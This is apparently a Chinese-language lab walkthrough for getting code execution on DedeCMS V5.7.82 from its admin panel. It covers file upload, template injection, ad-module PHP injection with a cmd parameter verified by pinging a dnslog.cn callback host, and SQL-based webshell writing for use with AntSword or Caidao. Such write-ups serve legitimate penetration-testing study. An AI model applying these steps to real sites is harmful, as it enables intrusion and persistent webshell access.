文件管理器
点击模块,选择上传文件
在电脑中新建2.php
<?php phpinfo();?>
访问2.php,验证是否成功
修改模板文件
在模块中找到index.htm
在index.htm加上<?php phpinfo();?>
点击生成->更新主页HTML,将index.html改为index.php
访问index.php,验证是否成功
后台任意命令执行
点击广告管理->增加广告
<?php phpinfo();?>
点击代码
得到地址
访问地址,无回显
http://192.168.117.67/DedeCMS-V5.7.82-UTF8/uploads/plus/ad_js.php?aid=1
在dnslog.cn上获得一个网址
再次访问,这样若成功将木马植入的话dnslog会显示访问记录
http://192.168.117.67/DedeCMS-V5.7.82-UTF8/uploads/plus/ad_js.php?aid=1&cmd=ping%20cs8vcw.dnslog.cn
后台sql命令执行
尝试查询basedir
在得到的目录下写入木马文件
访问后得到12.php
这些成功后可以用蚁剑,caidao连接